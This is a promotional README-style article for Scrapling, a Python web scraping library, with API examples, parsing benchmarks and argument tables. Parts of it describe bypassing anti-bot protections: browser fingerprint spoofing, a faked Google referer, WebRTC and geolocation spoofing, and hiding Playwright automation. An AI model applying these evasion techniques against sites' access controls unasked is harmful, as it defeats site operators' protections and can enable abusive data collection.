
Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • πŸ”„ Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • πŸ” Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling's powerful features.

High Performance

  • πŸš€ Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • πŸ”‹ Memory Efficient: Optimized data structures for minimal memory footprint.
  • ⚑ Fast JSON serialization: 10x faster than the standard library.

Developer Friendly

  • πŸ› οΈ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that take less memory than standard dictionaries, with added methods.
  • πŸ“ Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • πŸ”Œ Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • πŸ“˜ Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do an HTTP GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags where one of their 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

| # | Library | Time (ms) | vs Scrapling |
|:-:|---------|----------:|-------------:|
| 1 | Scrapling | 5.44 | 1.0x |
| 2 | Parsel/Scrapy | 5.53 | 1.017x |
| 3 | Raw Lxml | 6.76 | 1.243x |
| 4 | PyQuery | 21.96 | 4.037x |
| 5 | Selectolax | 67.12 | 12.338x |
| 6 | BS4 with Lxml | 1307.03 | 240.263x |
| 7 | MechanicalSoup | 1322.64 | 243.132x |
| 8 | BS4 with html5lib | 3373.75 | 620.175x |

As you see, Scrapling is on par with Scrapy and slightly faster than Lxml, which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml, but Scrapling is still 4 times faster.

Extraction By Text Speed Test

| Library | Time (ms) | vs Scrapling |
|---------|----------:|-------------:|
| Scrapling | 2.51 | 1.0x |
| AutoScraper | 11.41 | 4.546x |

Scrapling can find elements with more methods, and it returns full element Adaptor objects, not just the text as AutoScraper does. So, to make this test fair, both libraries extract an element by text, find similar elements, and then extract the text content of all of them. As you see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.
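For reference, here is a minimal sketch of how such per-run averaging could be done; this is a stand-in, not the project's actual benchmarks.py, and the parsing call in the usage comment is a placeholder:

import statistics
import timeit

def average_ms(func, runs=100):
    # Time each run individually and average the results,
    # mirroring the "average of 100 runs" methodology mentioned above.
    timings = [timeit.timeit(func, number=1) * 1000 for _ in range(runs)]
    return statistics.mean(timings)

# Hypothetical usage with any parsing workload:
# print(f"{average_ms(lambda: page.css('.quote .text::text')):.2f} ms")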

Installation

Scrapling is a breeze to get started with; starting from version 0.2.9, it requires Python 3.9 or later.

pip3 install scrapling

Then run this command to install the browser dependencies needed by the Fetcher classes:

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries, with added features, that make requests or fetch pages for you in a single-request fashion and then return an Adaptor object. This feature was introduced because previously the only option was to fetch the page yourself, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.
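For illustration, a minimal sketch of that manual route, using httpx here only as an example HTTP client:

import httpx
from scrapling.parser import Adaptor

# Fetch the page yourself with any HTTP client...
response = httpx.get('https://quotes.toscrape.com/')
# ...then build the Adaptor instance manually from the source
page = Adaptor(response.text, url='https://quotes.toscrape.com/')
quotes = page.css('.quote .text::text')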

Features

You might be slightly confused by now, so let me clear things up. All fetcher-type classes are imported in the same way:

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.
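A short sketch of how those extra attributes can be used, with the attribute names as listed above:

from scrapling.defaults import Fetcher

page = Fetcher.get('https://quotes.toscrape.com/')
print(page.status, page.reason)   # e.g. 200 OK
print(page.cookies)               # always a dictionary
print(page.request_headers)       # the headers that were actually sent
quotes = page.css('.quote .text::text')  # everything else works like an Adaptor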

[!NOTE] The auto_match argument is enabled by default which is the one you should care about the most as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers, which makes Fetcher create and use a real browser's headers, then set a referer header as if the request came from a Google search for this URL's domain. It's enabled by default. You can also set the number of retries with the retries argument for all methods, which makes httpx retry requests that fail for any reason. The default number of retries for all Fetcher methods is 3.

Note: all headers generated by the stealthy_headers argument can be overwritten by you through the headers argument.

You can route all traffic (HTTP and HTTPS) through a proxy for any of these methods, in this format: http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For async requests, you just replace the import, like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')
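Since these calls are awaitable, you can also fan out several requests concurrently with standard asyncio; a minimal sketch:

import asyncio
from scrapling.defaults import AsyncFetcher

async def main():
    urls = ['https://httpbin.org/get', 'https://httpbin.org/headers']
    # Run the requests concurrently; each result is a normal Response object
    pages = await asyncio.gather(*(AsyncFetcher.get(url) for url in urls))
    for page in pages:
        print(page.status)

asyncio.run(main())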

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

For the sake of simplicity, expand this for the complete list of arguments

| Argument | Description | Optional |
|:---:|---|:---:|
| url | Target url | ❌ |
| headless | Pass `True` to run the browser in headless/hidden mode (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | βœ”οΈ |
| block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| disable_resources | Drop requests of unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests for some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| google_search | Enabled by default; Scrapling will set the referer header as if this request came from a Google search for this website's domain name. | βœ”οΈ |
| extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if both are used._ | βœ”οΈ |
| block_webrtc | Blocks WebRTC entirely. | βœ”οΈ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ |
| addons | List of Firefox addons to use. **Must be paths to extracted addons.** | βœ”οΈ |
| humanize | Humanize the cursor movement. Takes either `True` or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | βœ”οΈ |
| allow_webgl | Enabled by default. Disabling WebGL is not recommended, as many WAFs now check whether WebGL is enabled. | βœ”οΈ |
| geoip | Recommended to use with proxies; automatically uses the IP's longitude, latitude, timezone, country, and locale, and spoofs the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | βœ”οΈ |
| disable_ads | Disabled by default; if enabled, this installs the `uBlock Origin` addon in the browser. | βœ”οΈ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ |
| timeout | The timeout in milliseconds used in all operations and waits through the page. The default is 30000. | βœ”οΈ |
| wait_selector | Wait for a specific CSS selector to be in a specific state. | βœ”οΈ |
| proxy | The proxy to be used with requests. It can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ |
| os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is for Scrapling to match the fingerprints to the current OS. | βœ”οΈ |
| wait_selector_state | The state to wait for the selector given with `wait_selector`. _The default state is `attached`._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
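To tie a few of these arguments together, here is a hedged sketch of a fetch that waits for content and runs a small automation step; the selectors are hypothetical, and `page_action` receives the underlying browser page object as described in the table above:

from scrapling.defaults import StealthyFetcher

def accept_cookies(page):
    # Hypothetical automation step: click a consent button, then hand the page back
    page.click('#accept-cookies')
    return page

page = StealthyFetcher.fetch(
    'https://example.com',
    headless=True,
    network_idle=True,              # wait for network connections to settle
    wait_selector='.content',       # wait for this selector...
    wait_selector_state='visible',  # ...to be visible, not just attached
    page_action=accept_cookies,
)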

PlayWrightFetcher

This class is built on top of Playwright and currently provides 4 main run options, which can be mixed as you see fit.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

Using this Fetcher class, you can make requests with:

  1. Vanilla Playwright, without any modifications other than the ones you chose.
  2. Stealthy Playwright, with the stealth mode I wrote for it. It's still a WIP, but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does:
     • Patching the CDP runtime fingerprint.
     • Mimicking some real browser properties by injecting several JS files and using custom options.
     • Using custom flags on launch to hide Playwright even more and make it faster.
     • Generating real browser headers of the same type and user OS, then appending them to the request's headers.
  3. Real browsers, by passing the real_chrome argument or the CDP URL of your browser for the Fetcher to control; most of the options can be enabled with it.
  4. NSTBrowser's docker browserless option, by passing the CDP URL and enabling the nstbrowser_mode option.

Note: using the real_chrome argument requires that you have the Chrome browser installed on your device.

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

Expand this for the complete list of arguments

| Argument | Description | Optional |
|:---:|---|:---:|
| url | Target url | ❌ |
| headless | Pass `True` to run the browser in headless/hidden mode (**default**), or `False` for headful/visible mode. | βœ”οΈ |
| disable_resources | Drop requests of unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests for some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate and use a real useragent of the same browser.** | βœ”οΈ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ |
| timeout | The timeout in milliseconds used in all operations and waits through the page. The default is 30000. | βœ”οΈ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ |
| wait_selector | Wait for a specific CSS selector to be in a specific state. | βœ”οΈ |
| wait_selector_state | The state to wait for the selector given with `wait_selector`. _The default state is `attached`._ | βœ”οΈ |
| google_search | Enabled by default; Scrapling will set the referer header as if this request came from a Google search for this website's domain name. | βœ”οΈ |
| extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if both are used. | βœ”οΈ |
| proxy | The proxy to be used with requests. It can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ |
| hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | βœ”οΈ |
| disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | βœ”οΈ |
| stealth | Enables stealth mode; always check the documentation to see what stealth mode currently does. | βœ”οΈ |
| real_chrome | If you have the Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | βœ”οΈ |
| locale | Set the locale for the browser if wanted. The default value is `en-US`. | βœ”οΈ |
| cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | βœ”οΈ |
| nstbrowser_mode | Enables NSTBrowser mode; **it has to be used with the `cdp_url` argument or it will be completely ignored.** | βœ”οΈ |
| nstbrowser_config | The config you want to send with requests to NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser docker browserless config._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
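As a rough sketch of those four run options using arguments from the table above (the CDP URL is a placeholder, not a documented endpoint):

from scrapling.defaults import PlayWrightFetcher

# 1) Vanilla Playwright
page = PlayWrightFetcher.fetch('https://example.com')

# 2) Scrapling's stealth mode
page = PlayWrightFetcher.fetch('https://example.com', stealth=True)

# 3) Your real Chrome browser
page = PlayWrightFetcher.fetch('https://example.com', real_chrome=True)

# 4) NSTBrowser's browserless over CDP (placeholder URL)
page = PlayWrightFetcher.fetch('https://example.com', cdp_url='ws://localhost:8848', nstbrowser_mode=True)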

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole tree of any element's ancestors like below:

for ancestor in quote.iterancestors():
    print(ancestor.tag)  # or do whatever you need with each ancestor...

You can search for a specific ancestor of an element that satisfies a function. All you need to do is pass a function that takes an Adaptor object as an argument and returns True if the condition is satisfied or False otherwise, like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element whose text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements whose text content matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
...     print({
...         "name": product.css_first('h3 a::text'),
...         "price": product.css_first('.price_color').re_first(r'[\d\.]+'),
...         "stock": product.css('.availability::text')[-1].clean()
...     })
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
    <section class="products">
        <article class="product" id="p1">
            <h3>Product 1</h3>
            <p class="description">Description 1</p>
        </article>
        <article class="product" id="p2">
            <h3>Product 2</h3>
            <p class="description">Description 2</p>
        </article>
    </section>
</div>

And you want to scrape the first product, the one with the p1 ID. You would probably write a selector like this:

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
    <div class="product-wrapper">
        <section class="products">
            <article class="product new-class" data-id="p1">
                <div class="product-info">
                    <h3>Product 1</h3>
                    <p class="new-description">Description 1</p>
                </div>
            </article>
            <article class="product new-class" data-id="p2">
                <div class="product-info">
                    <h3>Product 2</h3>
                    <p class="new-description">Description 2</p>
                </div>
            </article>
        </section>
    </div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1', auto_save=True)
if not element:  # One day the website changes?
    element = page.css('#p1', auto_match=True)  # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this, we would need to find a website that will change its design/structure soon, take a copy of its source, then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner, but that would make it a staged test haha.

To solve this issue, I will use the Wayback Machine from The Web Archive. Here is a copy of StackOverflow's website from 2010, pretty old, huh? Let's test if the auto-matching feature can extract the same button from the 2010 design and the current design using the same selector :)

If I want to extract the Questions button from the old design, I can use a selector like this: #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a. This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions:

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain. This is because, to Scrapling, these are two different URLs, not the same website, so it isolates their data. To tell Scrapling they are the same website, we pass the domain to use for saving both pages' auto-match data, so Scrapling doesn't isolate them.

In a real-world scenario, the code would be the same, except it would use the same URL for both requests, so you wouldn't need the automatch_domain argument. This is the closest example I can give to real-world cases, so I hope it doesn't confuse you :)

Notes:

  1. For the two examples above, I used the Adaptor class once and the Fetcher class the second time, just to show that you can create the Adaptor object yourself if you have the source, or fetch the source using any Fetcher class and have it create the Adaptor object for you.
  2. Passing the auto_save argument while the auto_match argument is set to False on initializing the Adaptor/Fetcher object will result in the auto_save argument value being ignored, with the following warning message: Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons, so the database gets created/connected only when you are planning to use the auto-matching features. The same applies to the auto_match argument.
  3. The auto_match parameter works only for Adaptor instances, not Adaptors, so something like page.css('body').css('#p1', auto_match=True) will raise an error because you can't auto-match a whole list; you have to be specific and do something like page.css_first('body').css('#p1', auto_match=True).

Find elements by filters

Inspired by BeautifulSoup's find_all function, you can find elements with the find_all/find methods. Both methods can take multiple types of filters and return all elements in the page that all these filters apply to.

To be more specific:

  • Any string passed is considered a tag name.
  • Any iterable passed, like a List/Tuple/Set, is considered an iterable of tag names.
  • Any dictionary passed is considered a mapping of HTML element attribute names to attribute values.
  • Any regex patterns passed are used as filters on elements by their text content.
  • Any functions passed are used as filters.
  • Any keyword argument passed is considered an HTML element attribute with its value.

So the way it works is that, after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements whose text content matches all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above, so if no tag name(s) are passed but attributes are, the process starts from that layer, and so on. The order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in their content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> import re
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object of any element directly:

>>> quote._root
<Element div at 0x107f98870>
  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods, but you have to set the identifier yourself.

  • To save an element to the database:

>>> element = page.find_by_text('Tipping the Velvet', first_match=True)
>>> page.save(element, 'my_special_element')

  • Later, when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this:

>>> element_dict = page.retrieve('my_special_element')
>>> page.relocate(element_dict, adaptor_type=True)
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.relocate(element_dict, adaptor_type=True).css('::text')
['Tipping the Velvet']

  • If you want to keep it as an lxml.etree object, leave out the adaptor_type argument:

>>> page.relocate(element_dict)
[<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
    lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function

# Find the first product with price 54.23
page.css('.product_pod').search(
    lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as in Scrapy:

quote.re(r'regex_pattern')        # Get all strings (TextHandlers) that match the regex pattern
quote.re_first(r'regex_pattern')  # Get the first string (TextHandler) only
quote.json()  # If the content text is jsonable, convert it to json using `orjson`, which is 10x faster than the standard json library and provides more options

    except that you can do more with them, like:

quote.re(
    r'regex_pattern',
    replace_entities=True,  # Character entity references are replaced by their corresponding character
    clean_match=True,       # This will ignore all whitespaces and consecutive spaces while matching
    case_sensitive=False,   # Set the regex to ignore letter case while compiling it
)

    All of these are methods of the TextHandler that contains the text content, so the same can be done directly if you call the .text property or an equivalent selector function.

  • Operations on the text content itself include:

  • Cleaning the text of any whitespace and replacing consecutive spaces with a single space:

quote.clean()

  • You already know about the regex matching and the fast JSON parsing, but did you know that all strings returned from a regex search are TextHandler objects too? So when, for example, a JS object is assigned to a JS variable inside JS code and you want to extract it with regex and then convert it to a JSON object, in other libraries this would take more than one line of code, but here it's one line:

page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()

  • Sorting all characters in the string as if it were a list and returning the new string:

quote.sort(reverse=False)

